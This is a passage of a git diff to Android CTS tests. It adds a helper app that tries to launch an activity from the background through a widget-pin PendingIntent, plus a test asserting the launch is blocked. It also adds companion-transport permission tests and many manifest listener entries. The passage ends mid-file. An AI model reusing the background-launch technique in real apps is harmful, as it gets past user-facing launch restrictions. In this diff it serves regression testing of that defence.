"compatibility-device-util-axt",
+ "cts-wm-util",
],
libs: ["android.test.base"],
// Tag this module as a cts test artifact
@@ -51,6 +52,7 @@
":CtsAppWidgetProvider1",
":CtsAppWidgetLauncher1",
":CtsAppWidgetProvider2",
+ ":CtsAppWidgetTestCasesBalApp",
],
per_testcase_directory: true,
}
diff --git a/tests/tests/appwidget/AndroidManifest.xml b/tests/tests/appwidget/AndroidManifest.xml
index e4c683f..5d8b055 100644
--- a/tests/tests/appwidget/AndroidManifest.xml
+++ b/tests/tests/appwidget/AndroidManifest.xml
@@ -22,6 +22,7 @@
<queries>
<!-- UpdateProviderInfoTest queries widget providers. -->
<package android:name="android.appwidget.cts.widgetprovider"/>
+ <package android:name="android.appwidget.cts.appbal" />
</queries>
<application>
@@ -101,6 +102,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.appwidget.cts"
android:label="Tests for the app widget APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/appwidget/AndroidTest.xml b/tests/tests/appwidget/AndroidTest.xml
index db4aa66..96c6a1e 100644
--- a/tests/tests/appwidget/AndroidTest.xml
+++ b/tests/tests/appwidget/AndroidTest.xml
@@ -26,8 +26,8 @@
<option name="test-file-name" value="CtsAppWidgetLauncher2.apk" />
<option name="test-file-name" value="CtsAppWidgetLauncher3.apk" />
<option name="test-file-name" value="CtsAppWidgetTestCases.apk" />
+ <option name="test-file-name" value="CtsAppWidgetTestCasesBalApp.apk" />
</target_preparer>
-
<target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
<option name="run-command" value="mkdir -p /data/local/tmp/cts/widgetprovider/" />
<option name="teardown-command" value="rm -rf /data/local/tmp/cts/widgetprovider"/>
diff --git a/tests/tests/appwidget/AppBal/Android.bp b/tests/tests/appwidget/AppBal/Android.bp
new file mode 100644
index 0000000..5c4b273
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/Android.bp
@@ -0,0 +1,41 @@
+// Copyright (C) 2014 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test {
+ name: "CtsAppWidgetTestCasesBalApp",
+ defaults: ["cts_defaults"],
+ srcs: [
+ "src/**/*.java",
+ ],
+
+ target_sdk_version: "32",
+
+ static_libs: [
+ "mockito-target-minus-junit4",
+ "ctstestrunner-axt",
+ "junit",
+ "compatibility-device-util-axt",
+ "cts-wm-util",
+ ],
+ libs: ["android.test.base"],
+ // Tag this module as a cts test artifact
+ test_suites: [
+ "cts",
+ "general-tests",
+ ],
+}
diff --git a/tests/tests/appwidget/AppBal/AndroidManifest.xml b/tests/tests/appwidget/AppBal/AndroidManifest.xml
new file mode 100755
index 0000000..e0c4ed1
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/AndroidManifest.xml
@@ -0,0 +1,56 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ ~ Copyright (C) 2019 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.appwidget.cts.appbal">
+ <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES"/>
+
+ <queries>
+ <!-- UpdateProviderInfoTest queries widget providers. -->
+ <package android:name="android.appwidget.cts.widgetprovider"/>
+ <package android:name="android.appwidget.cts" />
+ </queries>
+ <application>
+ <activity
+ android:name="android.appwidget.cts.appbal.BalActivity"
+ android:label="BalActivity"
+ android:visibleToInstantApps="true"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN"/>
+ <category android:name="android.intent.category.DEFAULT" />
+ </intent-filter>
+ </activity>
+
+ <activity
+ android:name="android.appwidget.cts.appbal.EmptyActivity"
+ android:exported="true" />
+
+ <service
+ android:name="android.appwidget.cts.appbal.BalService"
+ android:exported="true" />
+
+ <receiver android:name="android.appwidget.cts.appbal.BalAppWidgetProvider"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
+ </intent-filter>
+ <meta-data android:name="android.appwidget.provider"
+ android:resource="@xml/widget_info" />
+ </receiver>
+ </application>
+</manifest>
diff --git a/tests/tests/appwidget/AppBal/res/xml/widget_info.xml b/tests/tests/appwidget/AppBal/res/xml/widget_info.xml
new file mode 100644
index 0000000..b0e66ed
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/res/xml/widget_info.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+<appwidget-provider
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:minWidth="180dp"
+ android:minHeight="110dp"
+ android:updatePeriodMillis="86400000"
+ android:resizeMode="horizontal|vertical"
+ android:widgetCategory="home_screen">
+</appwidget-provider>
\ No newline at end of file
diff --git a/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalActivity.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalActivity.java
new file mode 100644
index 0000000..353b751
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalActivity.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.appwidget.cts.appbal;
+
+import android.app.Activity;
+import android.app.PendingIntent;
+import android.appwidget.AppWidgetManager;
+import android.content.Intent;
+import android.os.Bundle;
+import android.util.Log;
+
+public class BalActivity extends Activity {
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ }
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ requestAppWidget();
+ }
+
+ private void requestAppWidget() {
+ try {
+ // pinResult tries to launch a service which launches a background activity.
+ PendingIntent pinResult = PendingIntent.getService(this, 0,
+ new Intent(this, BalService.class),
+ PendingIntent.FLAG_ONE_SHOT | PendingIntent.FLAG_MUTABLE);
+ AppWidgetManager appWidgetManager = this.getSystemService(AppWidgetManager.class);
+ android.content.ComponentName firstWidgetProvider =
+ new android.content.ComponentName(this, BalAppWidgetProvider.class);
+ appWidgetManager.requestPinAppWidget(firstWidgetProvider, null, pinResult);
+ Log.i("BalActivity", "requested pin App widget");
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalAppWidgetProvider.java
similarity index 73%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalAppWidgetProvider.java
index 4416990..97eab2d 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalAppWidgetProvider.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -13,10 +13,9 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
+package android.appwidget.cts.appbal;
-package android.security.cts.CVE_2022_20143;
+import android.appwidget.AppWidgetProvider;
-import android.app.Activity;
-
-public class PocActivity extends Activity {
+public class BalAppWidgetProvider extends AppWidgetProvider {
}
diff --git a/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalService.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalService.java
new file mode 100644
index 0000000..c529681
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalService.java
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.appwidget.cts.appbal;
+
+import android.app.Service;
+import android.content.Intent;
+import android.os.Handler;
+import android.os.IBinder;
+import android.util.Log;
+
+public class BalService extends Service {
+
+ Handler mHandler;
+
+ public BalService() {
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return null;
+ }
+
+ @Override
+ public void onCreate() {
+ Log.i("BalService", "Service started");
+ mHandler = new Handler();
+ mHandler.postDelayed(this::startBackgroundActivity, 1000 * 30);
+ super.onCreate();
+ }
+
+ void startBackgroundActivity() {
+ try {
+ Log.e("BalService", "Start background activity called");
+ Intent intent = new Intent(this, EmptyActivity.class);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ this.startActivity(intent);
+
+ } catch (Exception e) {
+ Log.e("BalService", "startBackgroundActivity throws exception." + e);
+ }
+ }
+
+ @Override
+ public void onDestroy() {
+ Log.i("BalService", "Service destroyed!");
+ super.onDestroy();
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/EmptyActivity.java
similarity index 79%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/EmptyActivity.java
index 4416990..5b57d2c 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/EmptyActivity.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -13,10 +13,8 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
-
-package android.security.cts.CVE_2022_20143;
+package android.appwidget.cts.appbal;
import android.app.Activity;
-public class PocActivity extends Activity {
-}
+public class EmptyActivity extends Activity { }
diff --git a/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java b/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java
index 7fc7211..a8ac2ee 100644
--- a/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java
+++ b/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java
@@ -30,10 +30,10 @@
private PinItemRequest mRequest;
private BroadcastReceiver mReceiver;
+
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
-
try {
final LauncherApps launcherApps = getSystemService(LauncherApps.class);
mRequest = launcherApps.getPinItemRequest(getIntent());
diff --git a/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java b/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java
index 4e68779..6e9d788 100644
--- a/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java
+++ b/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java
@@ -16,20 +16,30 @@
package android.appwidget.cts;
+import static android.content.Intent.FLAG_ACTIVITY_NEW_TASK;
+import static android.server.wm.UiDeviceUtils.pressHomeButton;
+
import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertNotNull;
import static org.junit.Assert.assertTrue;
+import android.app.ActivityManager;
import android.app.PendingIntent;
import android.appwidget.AppWidgetManager;
+import android.appwidget.cts.activity.EmptyActivity;
import android.appwidget.cts.common.Constants;
+import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.LauncherApps;
import android.os.Bundle;
import android.platform.test.annotations.AppModeFull;
+import android.server.wm.WindowManagerStateHelper;
+import android.util.Log;
import com.android.compatibility.common.util.CddTest;
+import com.android.compatibility.common.util.SystemUtil;
import org.junit.After;
import org.junit.Before;
@@ -46,6 +56,8 @@
private String mDefaultLauncher;
+ protected WindowManagerStateHelper mWmState = new WindowManagerStateHelper();
+
@Before
public void setUpLauncher() throws Exception {
mDefaultLauncher = getDefaultLauncher();
@@ -57,7 +69,7 @@
setLauncher(mDefaultLauncher);
}
- @CddTest(requirement="3.8.2/C-2-2")
+ @CddTest(requirement = "3.8.2/C-2-2")
private void runPinWidgetTest(final String launcherPkg) throws Exception {
setLauncher(launcherPkg + "/" + LAUNCHER_CLASS);
@@ -103,7 +115,7 @@
assertEquals("dummy-2", resultReceiver.result.getStringExtra("dummy"));
}
- @Ignore("b/265187199")
+ //@Ignore("b/265187199")
@Test
public void testPinWidget_launcher1() throws Exception {
runPinWidgetTest("android.appwidget.cts.packages.launcher1");
@@ -115,9 +127,9 @@
runPinWidgetTest("android.appwidget.cts.packages.launcher2");
}
- @CddTest(requirement="3.8.2/C-2-1")
+ @CddTest(requirement = "3.8.2/C-2-1")
public void verifyIsRequestPinAppWidgetSupported(String launcherPkg, boolean expectedSupport)
- throws Exception {
+ throws Exception {
setLauncher(launcherPkg + "/" + LAUNCHER_CLASS);
Context context = getInstrumentation().getContext();
@@ -155,7 +167,52 @@
}
private void setLauncher(String component) throws Exception {
- runShellCommand("cmd package set-home-activity --user "
+ Log.i("BalActivity", "cmd package set-home-activity --user "
+ getInstrumentation().getContext().getUserId() + " " + component);
+ /*runShellCommand("cmd package set-home-activity --user "
+ + getInstrumentation().getContext().getUserId() + " " + component);*/
+ runShellCommand("cmd package set-home-activity "
+ + component);
}
+
+ @Test
+ public void testRequestPinAppWidgetNotAllBal() throws Exception {
+ String launcherPkg = "android.appwidget.cts.packages.launcher1";
+ setLauncher(launcherPkg + "/" + LAUNCHER_CLASS);
+ Context context = getInstrumentation().getContext();
+ // Request to pin widget
+ BlockingBroadcastReceiver setupReceiver = new BlockingBroadcastReceiver()
+ .register(Constants.ACTION_SETUP_REPLY);
+
+ // starts the BalActivity in the test app AppBal.
+ context.startActivity(new Intent(Intent.ACTION_MAIN)
+ .setPackage("android.appwidget.cts.appbal")
+ .addFlags(FLAG_ACTIVITY_NEW_TASK));
+
+ setupReceiver.await();
+ // Verify that the confirmation dialog was opened
+ assertTrue(setupReceiver.result.getBooleanExtra(Constants.EXTRA_SUCCESS, false));
+
+ // Accept the request
+ context.sendBroadcast(new Intent(Constants.ACTION_CONFIRM_PIN)
+ .setPackage(launcherPkg));
+
+ // Press home key to ensure stopAppSwitches is called because the last-stop-app-switch-time
+ // is a criteria of allowing background start.
+ pressHomeButton();
+ SystemUtil.runWithShellPermissionIdentity(ActivityManager::resumeAppSwitches);
+ mWmState.waitForHomeActivityVisible();
+ SystemUtil.runWithShellPermissionIdentity(ActivityManager::resumeAppSwitches);
+
+ boolean result = false;
+ // The background activity will be launched 30s after the BalService starts. The
+ // waitForFocusedActivity only waits for 5s. So put it in a for loop.
+ for (int i = 0; i < 10; i++) {
+ result = mWmState.waitForFocusedActivity(
+ "Empty Activity is launched", new ComponentName(context, EmptyActivity.class));
+ if (result) break;
+ }
+ assertFalse("Should not able to launch background activity", result);
+ }
+
}
diff --git a/tests/tests/assist/AndroidManifest.xml b/tests/tests/assist/AndroidManifest.xml
index 1847832..2d68e1a 100644
--- a/tests/tests/assist/AndroidManifest.xml
+++ b/tests/tests/assist/AndroidManifest.xml
@@ -49,5 +49,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.assist.cts"
android:label="CTS tests of android.assist">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/attributionsource/AndroidManifest.xml b/tests/tests/attributionsource/AndroidManifest.xml
index f2599b6..52ccf7d 100644
--- a/tests/tests/attributionsource/AndroidManifest.xml
+++ b/tests/tests/attributionsource/AndroidManifest.xml
@@ -43,6 +43,9 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.attributionsource.cts"
android:label="CTS permission attribution tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml b/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml
index adcfeb4..68e7025 100644
--- a/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml
+++ b/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml
@@ -47,6 +47,9 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.attributionsource.cts.blamed2"
android:label="CTS permission attribution tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/background/AndroidManifest.xml b/tests/tests/background/AndroidManifest.xml
index 1fdda71..f42da76 100755
--- a/tests/tests/background/AndroidManifest.xml
+++ b/tests/tests/background/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.cts.backgroundrestrictions"
android:label="CTS tests for background restrictions">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/batteryhealth/AndroidManifest.xml b/tests/tests/batteryhealth/AndroidManifest.xml
index ce213df..5aee337 100755
--- a/tests/tests/batteryhealth/AndroidManifest.xml
+++ b/tests/tests/batteryhealth/AndroidManifest.xml
@@ -23,6 +23,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.os.cts.batteryhealth"
android:label="CTS tests for battery health features">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/batterysaving/AndroidManifest.xml b/tests/tests/batterysaving/AndroidManifest.xml
index b5c1f70..c28fd40 100755
--- a/tests/tests/batterysaving/AndroidManifest.xml
+++ b/tests/tests/batterysaving/AndroidManifest.xml
@@ -30,6 +30,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.os.cts.batterysaving"
android:label="CTS tests for battery saving features">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/bluetooth/AndroidManifest.xml b/tests/tests/bluetooth/AndroidManifest.xml
index c72a503..a151200 100644
--- a/tests/tests/bluetooth/AndroidManifest.xml
+++ b/tests/tests/bluetooth/AndroidManifest.xml
@@ -38,6 +38,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.bluetooth.cts"
android:label="CTS tests of bluetooth component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/calendarcommon/AndroidManifest.xml b/tests/tests/calendarcommon/AndroidManifest.xml
index 0bbf132..ad94354 100644
--- a/tests/tests/calendarcommon/AndroidManifest.xml
+++ b/tests/tests/calendarcommon/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.calendarcommon2.cts"
android:label="CTS tests of calendarcommon">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<uses-sdk android:minSdkVersion="15" android:targetSdkVersion="17"></uses-sdk>
diff --git a/tests/tests/calendarprovider/AndroidManifest.xml b/tests/tests/calendarprovider/AndroidManifest.xml
index c5d2b11..62562ff 100644
--- a/tests/tests/calendarprovider/AndroidManifest.xml
+++ b/tests/tests/calendarprovider/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.provider.cts.calendar">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/car/AndroidManifest.xml b/tests/tests/car/AndroidManifest.xml
index fdeb18c..0dfa316 100644
--- a/tests/tests/car/AndroidManifest.xml
+++ b/tests/tests/car/AndroidManifest.xml
@@ -83,5 +83,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.car.cts"
android:label="CTS tests for Automotive">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/car_builtin/AndroidManifest.xml b/tests/tests/car_builtin/AndroidManifest.xml
index 9b19ba4..763b9b5 100644
--- a/tests/tests/car_builtin/AndroidManifest.xml
+++ b/tests/tests/car_builtin/AndroidManifest.xml
@@ -59,6 +59,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.car.cts.builtin"
android:label="CTS tests for car builtin api">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/carrierapi/AndroidManifest.xml b/tests/tests/carrierapi/AndroidManifest.xml
index 0c2f4dc..52057ac 100644
--- a/tests/tests/carrierapi/AndroidManifest.xml
+++ b/tests/tests/carrierapi/AndroidManifest.xml
@@ -30,6 +30,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.carrierapi.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml b/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml
index 9283a6c..5478303 100644
--- a/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml
+++ b/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.classloaderfactory.memcl.cts"
android:label="CTS tests of android.app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml b/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml
index 92be6d6..b2e8b75 100644
--- a/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml
+++ b/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.componentfactory.pathcl.cts"
android:label="CTS tests of android.app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/colormode/AndroidManifest.xml b/tests/tests/colormode/AndroidManifest.xml
index f88c7cd..48971af 100644
--- a/tests/tests/colormode/AndroidManifest.xml
+++ b/tests/tests/colormode/AndroidManifest.xml
@@ -31,6 +31,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.colormode.cts"
android:label="Tests for the Color Mode APIs." >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/companion/core/AndroidManifest.xml b/tests/tests/companion/core/AndroidManifest.xml
index f24a164..048558a 100644
--- a/tests/tests/companion/core/AndroidManifest.xml
+++ b/tests/tests/companion/core/AndroidManifest.xml
@@ -23,6 +23,9 @@
android:targetPackage="android.companion.cts.core"
android:label="CompanionDeviceManager Core CTS tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/companion/core/src/android/companion/cts/core/TransportPermissionTest.kt b/tests/tests/companion/core/src/android/companion/cts/core/TransportPermissionTest.kt
new file mode 100644
index 0000000..8aa26b2
--- /dev/null
+++ b/tests/tests/companion/core/src/android/companion/cts/core/TransportPermissionTest.kt
@@ -0,0 +1,121 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.companion.cts.core
+
+import android.Manifest
+import android.companion.AssociationInfo
+import android.companion.CompanionDeviceManager.MESSAGE_REQUEST_PING
+import android.companion.CompanionDeviceManager.OnMessageReceivedListener
+import android.companion.CompanionDeviceManager.OnTransportsChangedListener
+import android.companion.cts.common.MAC_ADDRESS_A
+import android.companion.cts.common.SIMPLE_EXECUTOR
+import android.platform.test.annotations.AppModeFull
+import androidx.test.ext.junit.runners.AndroidJUnit4
+import kotlin.test.assertFailsWith
+import org.junit.Test
+import org.junit.runner.RunWith
+
+/**
+ * Test System APIs for using CDM transports.
+ *
+ * Run: atest CtsCompanionDeviceManagerCoreTestCases:TransportPermissionTest
+ */
+@AppModeFull(reason = "CompanionDeviceManager APIs are not available to the instant apps.")
+@RunWith(AndroidJUnit4::class)
+class TransportPermissionTest : CoreTestBase() {
+
+ @Test
+ fun test_addOnTransportChangedListener_requiresPermission() {
+ // Create a regular (not self-managed) association.
+ targetApp.associate(MAC_ADDRESS_A)
+ val listener = OnTransportsChangedListener { _: MutableList<AssociationInfo> -> }
+
+ // Attempts to call addOnTransportChangedListener without the
+ // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+ // being thrown.
+ assertFailsWith(SecurityException::class) {
+ cdm.addOnTransportsChangedListener(SIMPLE_EXECUTOR, listener)
+ }
+
+ // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+ withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+ cdm.addOnTransportsChangedListener(SIMPLE_EXECUTOR, listener)
+ }
+
+ // Attempts to call removeOnTransportChangedListener without the
+ // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+ // being thrown.
+ assertFailsWith(SecurityException::class) {
+ cdm.removeOnTransportsChangedListener(listener)
+ }
+
+ // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+ withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+ cdm.removeOnTransportsChangedListener(listener)
+ }
+ }
+
+ @Test
+ fun test_addOnMessageReceivedListener_requiresPermission() {
+ // Create a regular (not self-managed) association.
+ targetApp.associate(MAC_ADDRESS_A)
+ val listener = OnMessageReceivedListener { _: Int, _: ByteArray -> }
+
+ // Attempts to call addOnMessageReceivedListener without the
+ // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+ // being thrown.
+ assertFailsWith(SecurityException::class) {
+ cdm.addOnMessageReceivedListener(SIMPLE_EXECUTOR, MESSAGE_REQUEST_PING, listener)
+ }
+
+ // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+ withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+ cdm.addOnMessageReceivedListener(SIMPLE_EXECUTOR, MESSAGE_REQUEST_PING, listener)
+ }
+
+ // Attempts to call removeOnMessageReceivedListener without the
+ // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+ // being thrown.
+ assertFailsWith(SecurityException::class) {
+ cdm.removeOnMessageReceivedListener(MESSAGE_REQUEST_PING, listener)
+ }
+
+ // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+ withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
